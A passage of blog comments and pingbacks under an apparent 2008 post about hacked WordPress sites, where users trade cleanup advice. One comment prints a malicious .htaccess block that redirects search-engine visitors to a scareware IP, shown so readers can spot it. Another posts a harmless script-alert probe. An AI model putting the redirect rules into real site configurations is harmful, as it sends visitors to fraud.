Pingback: Sunday Chatter - 6/15
Pingback: I’m Just Sharing » Blog Archive » Update Your Blog Software
Pingback: cearta.ie » Blawg Review #164
Pingback: Catch website file changes with AIDE
Pingback: Selamatkah Blog Wordpress Anda..? | Rahsia Komputer
Pingback: GUYA.NET » Blog Archive » My blog has been hacked
Kisu (1 comments.) on June 16, 2008 at 7:44 pm.
It’s an arms race, and I always feel like I’m playing catch up.
How reliable is protecting your wp-admin folder with an .htaccess file to limit it to your home IP address.
If they’re not on my whitelist of IP addresses, is there a way around to access wp-admin?
Thanks for all of your help
Pingback: Wordpress et sécurité: prudence | Runpedia: Tout Savoir...
Pingback: Arkitipâ„¢ | Intelligence | Blog Archive | Hackz
Pingback: WordCast 16: Serenade the Developers | Kym Huynh
Ãlvaro Degives-Más (8 comments.) on June 17, 2008 at 9:16 pm.
I’m getting an awful lot of hits from bots looking for the following:
/wp-includes/js/thickbox/\”+urlNoQuery[0]+\”
Anyone else getting that too? No idea what vulnerability they’re probing, but it just doesn’t feel right, looking at the numbers of requests I’m getting for that resource.
Paul (1 comments.) on June 18, 2008 at 3:18 am.
Thanks for the article, I had 5 of my blogs hacked in various ways. All upgraded and repaired now, it was a shock to see how quickly they got it though.
Pingback: blosque.com | Suas Visitas do Google Sumiram? Seu Wordpress Pode Ter Sido Hackeado
Pingback: Speeding Links for Search For Blogging Readers | www.searchforblogging.com
DUrkin (1 comments.) on June 19, 2008 at 3:46 am.
just stumbled across your page. i run this theme too and i can’t stand it haha. You seem to be managing better than me here
Pingback: So, you think that your WordPress Blog is safe | Windmill of my Mind
Pingback: Red Sweater Blog - If Your WordPress Was Hacked
Pingback: If Your WordPress Was Hacked « Unspun
Pingback: The Hot Crew » Lessons Learneded’
Pingback: Is Your WordPress Blog Hacked?
Pingback: Wordpress Blogs Hacked? | Slow Streamyx
Pingback: Upgrade Complete, and hopefully now safe from the hacker
Leon Quinn (2 comments.) on June 25, 2008 at 11:43 pm.
Excellent advice man, followed it after being referred to this post by Conor from Louder Voice..
Pingback: The WordPress Podcast » Episode 43: Out of date blogs hacked, All-In-One SEO gets dropped, then picked up
Pingback: WordPress Exploit Scanner 0.1
Bryan - After5PC (1 comments.) on June 26, 2008 at 7:38 pm.
That’s why it’s always important to upgrade to the latest version of WordPress when it’s available.
It can be a hassle, I must admit, but it’s worth it!
Pingback: Wordpress Exploit Scanner Plugin
Mathias (1 comments.) on June 26, 2008 at 9:35 pm.
Thanks for the extensive explanation, one of my blogs got hacked a ouple of weeks ago. Some encoded javascript code was injected to the wp-blog-header.php file. It took me a while to figure out.
Pingback: John Beales - Blog Archive » Wordpress Exploit Scanner should mean Fewer Hacked Blogs
Movie Goers (1 comments.) on June 27, 2008 at 2:39 pm.
thanks for sharing this, security alert =)
Pingback: WordPress安全扫ææ’件
Pingback: WordPress Exploit Scanner | docs4beto
Pingback: Osteospermum
Pingback: Secure Your Wordpress | St0rY oF uNpReDiCtAbLe LiFe II
Pingback: WordPress PSA
Marios Alexandrou (1 comments.) on June 30, 2008 at 12:15 am.
Another easy thing to do is regularly FTP sync from your computer to your host. Set up the FTP software to replace files with whatever is on your computer and to delete everything else. Once a script is setup, all it takes is a click to replace/wipe infected files.
Pingback: but wait, there’s MORE! WordPress Hacking and more!
Pingback: Multiple WordPress Sites Vulnerable to Hackers | Infosec Events
Pingback: Site Upgrade
Pingback: WordPress Security | WordPress Web 2.0 Spot-Er
Pingback: Older Versions of WordPress Hacked | SuccessCREEations, Inc.
Pingback: Gehackte Schweizer Blogs » BloggingTom
Pingback: Mein Blog wurde gehackt | derBlogger
Pingback: It’s a cool day but…. | The Obnoxious 5xmom
Eugen J (1 comments.) on July 3, 2008 at 4:07 pm.
There is something more over here http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/
If you got attacked, you sure have an user added, called WordPress, visible if you disable javascript in the browser, or visible in the database, with no nicename, created at 00:00:00 0000-00-00.
In wp_options table, active_plugins you also have the links_cache where are stored the spam links that show up for Googlebot, but not to you.
Check on http://www.web-sniffer.net on http://www.denisuca.com.
Googlebot sees: http://web-sniffer.net/?url=http%3A%2F%2Fdenisuca.com%2F&submit=Submit&http=1.1&gzip=yes&type=GET&uak=7
On Internet Explorer 7 or else you will see: http://web-sniffer.net/?url=http%3A%2F%2Fdenisuca.com%2F&submit=Submit&http=1.1&gzip=yes&type=GET&uak=2
Googlebot sees the spam links hidden in links_cache.
The problem is more complex, but it shoud be stopped.
There are more locations for there .jpg,.jpgg,.jpeg files. Found some 4 subfolders below in wp-includes tinyMCE.
And another thing… Attacks were also possible in the latest WordPress stable version.
Pingback: So, I Got Hacked… at forgedeuphoria.com
Pingback: Loosely Speaking—A Virtual Assistant’s Blog » Busted by Google?
Pingback: Best advice on Wordpress spam injection evarrr | Make$ Money$ Blog - Truth, no scam
Pingback: JudoNotes » Blog Archive » Hacked
Pingback: Wordpress Hardening: A must do! at Sketchy Ideas
dfsd on July 9, 2008 at 10:22 am.
alert(‘hi visitor’);
Pingback: How our WordPress blog was hacked | Inside 123-reg
Pingback: links for 2008-07-12 « Mandarine
Pingback: Why you should upgrade your WordPress installation to version 2.6 (just released) today - Gabriel - Web Design, Development and Business
Pingback: mike demers dot net » Blog Archive » My WordPress Blog Got Hacked by a Spammer
Pingback: WordCamp Fraser Valley Liveblog » Vancouver Blog Miss 604
Pingback: SmileHappy » Blog Archive » Dicas de segurança para blogs (Wordpress)
Pingback: Another Useful WordPress Security Plugin at xentek
Pingback: Wordpress hacking
Pingback: Cureless » Blog Archive » What compelled me to upgrade? (Part II)
Wendi (1 comments.) on July 30, 2008 at 3:47 pm.
Thanks for this post. I read this about a month ago and wanted to upgrade but my webhost only had the older version available. Too bad cuz now I have been hacked. =(
Pingback: My Site Was Hacked | TheFreebieBlogger
Pingback: Praneel’s Blog » My Wordpress Blog got hacked !
MountedWen on August 3, 2008 at 3:05 am.
What does the hack do?
Give hacker root access?
Pingback: Wordpress Security Woes
Pingback: a little piece of umi on the net » Blog Archive » My bad judgement..
Pingback: WOMZE » Blog Archive » Blog pains. No DR plan.
Jenn on September 2, 2008 at 11:44 pm.
I have (had) Yahoo for the hosting on my site that got hacked, and they don’t offer anything above WP 2.5 (I should have upgraded via ftp, though).
Sadly, when my site went down last week, Yahoo refused to put it back up because they said it messed up their server farm. I went and looked at the files and sure enough, somehow the hackers got tons of spammy credit card links into my hear – what a nightmare! It’s already cost me over $1000 in losses – too bad we can’t find these jerks and sue them.
So now I’m in the process of transferring the domain and moving to a different host.
Terry (1 comments.) on September 4, 2008 at 1:45 pm.
Phew. When I get hold of the slimeball who screwed (more than 10 of) my blogs I will claim diminished responsibility due to rage at being violated. These scumbags cannot be found but if they se my email address then I get my site hosting revoked with no reasons given and no refund. I like justice – shame their ain’t any.
Thanks for the info – I am hardening as we speak.
Sze on September 9, 2008 at 11:09 am.
Hi
my site has been hacked
I found your site using google
however, i follow your instructions but i am not able to find what you mention in the database
is it a new hack or what?
please help
thanks
Pingback: Womze - A working mothers life… » Blog pains. No DR plan.
Pingback: Mrs. Mecomber’s Scrapbook » Blog Archive » Did Your Blog Get Hacked?
Pingback: Quant Recruiter » Hacked!
Pingback: Techvibes|Blog|Calgary,Edmonton,Kitchener-Waterloo,Montréal,Ottawa,Portland,Seattle,Toronto,Vancouver,Victoria
Omar (1 comments.) on September 18, 2008 at 1:14 pm.
Really? wow i didnt know they can hack wordpress that easily and quick. Well im already updated to the latest version. Ill see from time to time on the htaccess file incase it was hacked. thanks for letting us know though.
Pingback: Wordpress Security Issues | SEO, PPC and Analytics by Ryan Nagy. The Web Whisperer
Pingback: Got Hacks? » random process | charlie 2.0
Pingback: the passionate ailurophile | I was hacked by a spammer
Pingback: WordCast 16: Serenade the Developers | WordCast
Pingback: Has your Wordpress blog been hacked?
Pingback: WordPress Hacked? 7 Great Self Hosted Blog Platforms as WordPress Alternatives for SEO & Business | SEOptimise
Pingback: WordPress Hacked? 7 Great Self Hosted Blog Platforms as WordPress Alternatives for SEO & Business | Webbyn.com
rosie on October 26, 2008 at 12:54 am.
Hi, this post is simply beyond great. You should write a book on it. One of our sites were hacked,http://www.hornerartworkshop.com we did a noscript search, found a bugger and deleted. We also went to Google Webmaster tools for resubmission. After several weeks still shows on listing in the search that says site is dangerous and Firefox tells you to RUN!
Any suggestions?
Pingback: Hackers Attack & Stats Drop: Your Wordpress Blog Could be a Victim | national real estate opinion column - agentgenius.com
Pingback: Writings in keinism » Blog Archive » Wordpress: Upgrade or be hacked! - Life improvement, photography & technology in Melbourne.
Kim (1 comments.) on November 19, 2008 at 11:51 pm.
I’ve been experiencing period hack attempts by the same methods used in what you call the “ekibastos attack”, the latest one being this AM. I’ve kept my WordPress installs upgraded to the latest version available, so whoever this is hasn’t been able to get in, thank goodness.
I also did a few things to lock down my WP install a bit more, as well as downloading and running the WordPress Exploit Scanner this evening – everything came back clean after the scan. Thanks for writing that plugin!
Pingback: Hans Berg» Blog Archive » Mer virus
Cenay (1 comments.) on December 3, 2008 at 11:43 pm.
Thanks for these hack notes! Here’s one I found…
A few days ago, I was working on one of my blogs, and I happen to notice that the .htaccess file was larger than I remembered. I am talking about file size here . Yeah, I know. It’s not the kind of thing most people notice, but I kinda have a thing for numbers. And yes , I am a geek.
Anyway… I notice the file size and start thinking, it shouldn’t be that large. So, I download it from my domain to take a peek. Sure enough, some scum bag (bleep) piece of (bleep) hacker type has uploaded a new .htaccess file. It’s purpose? To fake people out and sell anti-virus software. That’s it.
The .htaccess file’s real purpose is to help WordPress display *pretty links* as the URL. It takes the title of the post and adds dashes and uses that as the URL. Great for Google Link Love ! I put a sample of what that looks like for a typical WordPress blog below. You might want to compare yours…
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
The modified .htaccess file basically says… if someone is *referred* from Google (or AOL, or Yahoo, etc), then display a little window that says they are being attacked, and then redirect them to the site where they can buy some protection. Piece of (bleep). The sad part is that this technique works on a lot of people. And they used MY site to do it!
Can you guess what that does to my reputation for first time visitors?
Here’s the additional code the piece of (bleep) added to my .htaccess file. Again, you might want to review yours and make sure it doesn’t include this.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
Gotta Respect Google
The downside to having a popular blog? Google comes by often. This would be a good thing, normally . Except for one little thing. Google came by while the bogus .htaccess file was there! Net result? Google thought I was a malware site and setup a redirect page that basically said I was attacking my visitors. Yeah. Cool, huh?
But, you have to respect a service like Google that is simply focused on making the surfing experience a better one for their visitors. They included a note to the webmaster on the nasty-gram-page on what to do to clean your site. Google even offered a *review* process to make sure all the fixes took.
I requested a review at 11am this morning, and by 11pm, my site was back online. Kudo’s Google on having your process down pat and helping *the-little-guy* get back up and running so quickly.
So, do yourself a favor all you self-hosted bloggers out there … go check your .htaccess file. Make sure it only contains what you expect it to contain. And while you are there, update the permissions to remove the *write* feature. I did.